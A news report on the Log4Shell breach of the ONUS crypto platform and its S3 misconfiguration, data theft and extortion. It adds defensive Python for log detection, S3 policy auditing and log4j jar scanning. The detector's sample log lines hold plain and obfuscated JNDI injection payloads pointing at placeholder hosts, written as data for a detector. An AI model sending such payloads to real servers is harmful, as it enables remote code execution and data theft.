Fintech company hacked via Log4j refuses to pay $5 million ransom; customer data is being sold online.

ONUS, one of Vietnam’s largest crypto trading platforms, was recently found to have suffered a cyber attack on its payment system, which was running a vulnerable version of Log4j.

Related: CyStack, “The attack on ONUS – A real-life case of the Log4Shell vulnerability” (also available in Vietnamese).

ONUS, one of the largest cryptocurrency platforms in Vietnam, was hacked a few days ago.

The ONUS incident started with the Log4Shell vulnerability in the company’s payment software, which is supplied by Cyclos, and later escalated because of misconfigured access permissions on AWS S3.

The attackers took advantage of a vulnerability in Cyclos’ software before the vendor could notify customers and provide a patch.

ONUS patched the vulnerability as soon as it was alerted by Cyclos, but it was too late.

As a result, the E-KYC data, personal information, password hashes, and other records of 2 million ONUS users were exposed.

A threat group demanded $5 million from ONUS and threatened to release customer data if the company did not comply; after ONUS refused to pay, the group put the data of nearly 2 million ONUS customers up for sale on forums.

Vulnerable log4j version used in payment software

On December 9, 2021, a proof-of-concept exploit for the Log4Shell vulnerability in Log4j (CVE-2021-44228) was published on GitHub. It quickly caught the attention of attackers, who began mass-scanning the Internet for vulnerable servers.

Between December 11 and 13, 2021, the Log4Shell vulnerability on ONUS’s Cyclos server appears to have been successfully exploited to plant a backdoor for persistent access.
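
What those scans look like in a web server’s access log, and why a naive search for the literal string `${jndi:` misses most of them: Log4j resolves nested lookups such as `${lower:j}` and the `${name:-default}` fallback before it performs the JNDI lookup, so a detector has to resolve them the same way. The following Python is an added example, not code from the article, CyStack or ONUS; the log lines in it are constructed for illustration and the IP addresses are documentation ranges.

```python
import re
from typing import Dict, List, Optional

# Constructed access-log lines (not from ONUS or CyStack): one normal request
# followed by four probes. Only the first probe spells out "${jndi:" literally;
# the others hide it behind lookups that Log4j resolves before the JNDI call.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [11/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:ldap}://198.51.100.7:1389/a}"',
    '203.0.113.10 - - [11/Dec/2021:10:02:00 +0000] "GET /${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.8:1099/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.11 - - [11/Dec/2021:10:03:00 +0000] "GET /?q=${${env:NaN:-j}ndi:dns://198.51.100.9/a} HTTP/1.1" 200 512 "-" "-"',
]

# A lookup with no further ${...} nested inside it.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The pattern an exploit attempt collapses to once the lookups are resolved.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def resolve_lookup(body: str) -> Optional[str]:
    """Resolve one innermost lookup body the way Log4j's substitutor would.

    Handles the tricks seen in scanning traffic: the ":-" default value (used
    when the named lookup fails, e.g. ${::-j} or ${env:NaN:-j}) and the
    lower/upper lookups. Anything else (date, ctx, jndi, ...) is left alone.
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep and name.strip().lower() == "lower":
        return arg.lower()
    if sep and name.strip().lower() == "upper":
        return arg.upper()
    return None


def normalize_lookups(text: str) -> str:
    """Repeatedly resolve innermost lookups until nothing more changes."""
    while True:
        changed = False

        def replace(match):
            nonlocal changed
            resolved = resolve_lookup(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNERMOST_LOOKUP.sub(replace, text)
        if not changed:
            return text


def detect_log4shell_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per line that contains a JNDI lookup after normalization."""
    hits = []
    for line in lines:
        match = JNDI_LOOKUP.search(normalize_lookups(line))
        if match:
            hits.append({
                "client": line.split(" ", 1)[0],       # first field of a combined log line
                "scheme": match.group(1).lower(),     # ldap, rmi, dns, ...
                "raw": line,
            })
    return hits


if __name__ == "__main__":
    for hit in detect_log4shell_attempts(SAMPLE_LOG_LINES):
        print(f"{hit['client']}: JNDI lookup via {hit['scheme']}")
```

Normalizing before matching is the point: the last three sample lines contain no `jndi` substring at all until the lookups are resolved. The `dns://` case matters too, because scanners used DNS-only callbacks to find vulnerable hosts before sending an actual payload.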

Cyclos is a provider of point-of-sale (POS) and payment software solutions and, like many vendors, was using a vulnerable version of log4j in its software.

Cyclos issued an advisory on December 13 telling ONUS to apply the patch, but by then it seems to have been too late.

Related: Cyclos users forum thread on the log4j security issue in Cyclos.

Although ONUS patched Cyclos, the window between the initial exploitation and the patch gave the threat group enough time to exfiltrate sensitive databases.

These databases contained approximately 2 million customer records, including E-KYC (electronic Know Your Customer) data, personal information, and hashed passwords.

E-KYC workflows adopted by banks and fintech companies usually require some form of identification documents or certificates from customers, and also use “video selfies” for automated verification.

The Log4Shell vulnerability was on a sandbox server used “for programming purposes only”, but a misconfiguration allowed the attacker to move on to the sensitive data storage location, an Amazon S3 bucket where production data was stored.

ONUS then received an extortion demand for $5 million, which it allegedly refused.

Instead, the company chose to disclose the attack to its customers through a private Facebook group.

Chien Tran, CEO of ONUS:

As a company that puts safety first, we are committed to providing our customers with transparent and honest business operations.

That’s why, after careful consideration, the right thing to do now is to inform the entire ONUS community about this incident.

Amazon S3 bucket misconfiguration

This hack itself goes a bit further than just the Log4j issue.

The Log4j exploit may have been the attacker’s entry point, but improper access controls on the ONUS Amazon S3 bucket allowed the attacker unwarranted access.

Hackers took advantage of a vulnerability in a series of libraries on the ONUS system to break into a sandbox server (for programming purposes only).

However, due to a configuration issue, the server contained information that allowed the attacker to access our data storage system (Amazon S3) and steal critical data. This poses a risk of exposing the personal information of many users.

Customer information obtained by the threat actor is as follows:

  • Name
  • Email and phone number
  • Address
  • KYC information
  • Encrypted password
  • Transaction history
  • Other encrypted information

CyStack, a cybersecurity company that provided services to ONUS, conducted a thorough investigation and released its findings on the attack mechanism and the backdoor planted by the attackers.

Approximately 2 million customer records are up for sale

By December 25, it was revealed that the threat group, having failed to obtain a ransom from ONUS, had put customer data up for sale on a data breach marketplace.

The threat group claims to hold a copy of 395 ONUS database tables containing customers’ personal information and hashed passwords.

We have also seen samples of this kind of data published in the forum.

The sample also included images of customer ID cards and passports and the selfie videos customers had submitted through the KYC process.

This is also an opportunity for us to review ourselves and upgrade our system to ensure the safety of our users and to make it even more perfect, especially during the transition from VNDC to ONUS.

CyStack’s recommendations to ONUS were to patch the Log4Shell vulnerability in Cyclos as instructed by the vendor, disable the leaked AWS credentials, configure AWS access permissions properly, block all public access to sensitive S3 buckets, and add further restrictions.
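
What “block all public access” and “configure AWS access permissions properly” look like in practice, as an added example that is not code from CyStack, ONUS or the article: a small audit that flags bucket policy statements granting access to everyone, a least-privilege policy for comparison, and the four S3 Block Public Access settings that make such a grant impossible at the bucket level. The bucket name, account ID and role name are made up for the example.

```python
import json
from typing import Any, Dict, List

# Constructed bucket policies (not ONUS's real configuration). The first grants
# read access to anyone on the Internet; the second grants it to one IAM role
# and, separately, denies plaintext HTTP to everybody.
PUBLIC_READ_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-kyc-data", "arn:aws:s3:::example-kyc-data/*"],
    }],
})

LEAST_PRIVILEGE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AppRoleReadOnly",
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::123456789012:role/payments-app"},
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::example-kyc-data/*",
        },
        {
            "Sid": "DenyInsecureTransport",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:*",
            "Resource": ["arn:aws:s3:::example-kyc-data", "arn:aws:s3:::example-kyc-data/*"],
            "Condition": {"Bool": {"aws:SecureTransport": "false"}},
        },
    ],
})

# The four S3 Block Public Access settings. With all of them on, S3 rejects a
# policy like PUBLIC_READ_POLICY and ignores public ACLs on the bucket.
PUBLIC_ACCESS_BLOCK = {
    "BlockPublicAcls": True,
    "IgnorePublicAcls": True,
    "BlockPublicPolicy": True,
    "RestrictPublicBuckets": True,
}


def _is_wildcard_principal(principal: Any) -> bool:
    """True for both spellings of 'everyone': "*" and {"AWS": "*"} (or a list holding "*")."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def audit_bucket_policy(policy_json: str) -> Dict[str, List[str]]:
    """Classify Allow statements that grant to a wildcard principal.

    "public": wildcard principal and no Condition, so anyone can use it.
    "review": wildcard principal with a Condition; some keys (aws:SourceIp,
              aws:PrincipalOrgID, ...) make it non-public and others do not,
              so a human or the S3 GetBucketPolicyStatus API has to judge.
    Deny statements with Principal "*" are normal and are not reported.
    """
    statements = json.loads(policy_json).get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    result: Dict[str, List[str]] = {"public": [], "review": []}
    for index, statement in enumerate(statements):
        sid = statement.get("Sid", f"Statement[{index}]")
        if statement.get("Effect") != "Allow":
            continue
        if not _is_wildcard_principal(statement.get("Principal")):
            continue
        result["review" if statement.get("Condition") else "public"].append(sid)
    return result


def public_access_block_command(bucket: str) -> str:
    """The aws CLI call that applies PUBLIC_ACCESS_BLOCK to one bucket."""
    settings = ",".join(f"{key}={str(value).lower()}" for key, value in PUBLIC_ACCESS_BLOCK.items())
    return (f"aws s3api put-public-access-block --bucket {bucket} "
            f"--public-access-block-configuration {settings}")


if __name__ == "__main__":
    for name, policy in [("public-read", PUBLIC_READ_POLICY), ("least-privilege", LEAST_PRIVILEGE_POLICY)]:
        print(name, audit_bucket_policy(policy))
    print(public_access_block_command("example-kyc-data"))
```

Blocking public access closes the anonymous path only. If the sandbox server held valid AWS credentials, as ONUS’s statement suggests, the attacker was an authenticated principal, and no bucket setting stops that: those keys have to be revoked, and whatever replaces them scoped to the single role and the single action the application actually needs, as in the second policy above.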

The Log4j vulnerability has been exploited by threat actors of every kind, from state-sponsored groups to ransomware gangs, including to plant cryptocurrency miners on vulnerable systems.

The Conti ransomware gang is also trying to exploit vulnerable VMware vCenter servers.

Log4j users should upgrade immediately to the latest version, 2.17.1 (Java 8), which was released yesterday. Backported versions 2.12.4 (Java 7) and 2.3.2 (Java 6) containing the same fix are due to be released shortly.
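
A quick way to find out which jars on a host still need that upgrade. This is an added example, not code from the article or from the Log4j project: it reads the version from the jar’s file name or, for renamed or vendor-bundled copies, from the Maven `pom.properties` that log4j-core jars carry, compares it against the fixed version named above for that release line, and reports whether `JndiLookup.class` (the class Apache told users to delete as an interim mitigation) is still present. The jars that `demo()` scans are constructed stand-ins built with `zipfile`, not real Log4j builds.

```python
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

# Fixed versions per release line as of this article: 2.17.1 for the Java 8
# line, with 2.12.4 (Java 7) and 2.3.2 (Java 6) as the backport lines.
DEFAULT_FIXED = (2, 17, 1)
BACKPORT_FIXED = {(2, 12): (2, 12, 4), (2, 3): (2, 3, 2)}
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FILENAME_VERSION = re.compile(r"^log4j-core-(\d+)\.(\d+)\.(\d+)")
Version = Tuple[int, ...]


def parse_log4j_core_version(filename: str) -> Optional[Version]:
    """Version from a file name such as log4j-core-2.14.1.jar, else None."""
    m = FILENAME_VERSION.match(os.path.basename(filename))
    return tuple(int(x) for x in m.groups()) if m else None


def version_from_pom(jar: zipfile.ZipFile) -> Optional[Version]:
    """Version from the Maven pom.properties inside a (possibly renamed) jar."""
    if POM_PROPERTIES not in jar.namelist():
        return None
    for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            m = re.match(r"(\d+)\.(\d+)\.(\d+)", line.split("=", 1)[1].strip())
            if m:
                return tuple(int(x) for x in m.groups())
    return None


def minimum_fixed_version(version: Version) -> Version:
    """Lowest patched release on the same line as the given version."""
    return BACKPORT_FIXED.get(version[:2], DEFAULT_FIXED)


def assess_jar(path: str) -> Dict[str, object]:
    with zipfile.ZipFile(path) as jar:
        version = parse_log4j_core_version(path) or version_from_pom(jar)
        jndi_present = JNDI_LOOKUP_CLASS in jar.namelist()
    if version is None:
        verdict = "unknown"
    elif version[0] < 2:
        verdict = "log4j 1.x, not affected by Log4Shell"
    elif version < minimum_fixed_version(version):
        # Deleting JndiLookup.class mitigates CVE-2021-44228 but not the later
        # fixes, so a jar without the class is still reported as outdated.
        verdict = "vulnerable" if jndi_present else "outdated, JndiLookup.class removed"
    else:
        verdict = "patched"
    return {
        "jar": os.path.basename(path),
        "version": ".".join(map(str, version)) if version else None,
        "jndi_lookup_present": jndi_present,
        "verdict": verdict,
    }


def scan_directory(root: str) -> List[Dict[str, object]]:
    """Assess every *.jar under root, sorted by file name."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".jar"):
                results.append(assess_jar(os.path.join(dirpath, name)))
    return sorted(results, key=lambda r: str(r["jar"]))


def build_fake_jar(path: str, version: str, with_jndi_lookup: bool = True) -> None:
    """Constructed stand-in for a log4j-core jar: right layout, no real bytecode."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
        if with_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")


def demo() -> List[Dict[str, object]]:
    """Scan a temporary lib/ directory holding five constructed jars."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "lib")
        os.makedirs(lib)
        build_fake_jar(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1")
        build_fake_jar(os.path.join(lib, "log4j-core-2.12.2.jar"), "2.12.2")
        build_fake_jar(os.path.join(lib, "log4j-core-2.15.0.jar"), "2.15.0", with_jndi_lookup=False)
        build_fake_jar(os.path.join(lib, "log4j-core-2.17.1.jar"), "2.17.1")  # class still ships in 2.17.1
        build_fake_jar(os.path.join(lib, "vendor-logging.jar"), "2.3.1")      # renamed copy, version only in pom
        return scan_directory(root)


if __name__ == "__main__":
    for r in demo():
        print(f"{r['jar']}: {r['version']} -> {r['verdict']}")
```

Point the scanner at the application’s library directories rather than trusting the vendor’s release notes: as the Cyclos case shows, the vulnerable library sits inside third-party software, and a renamed or shaded copy will not show up in a search for `log4j-core-*.jar` alone.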
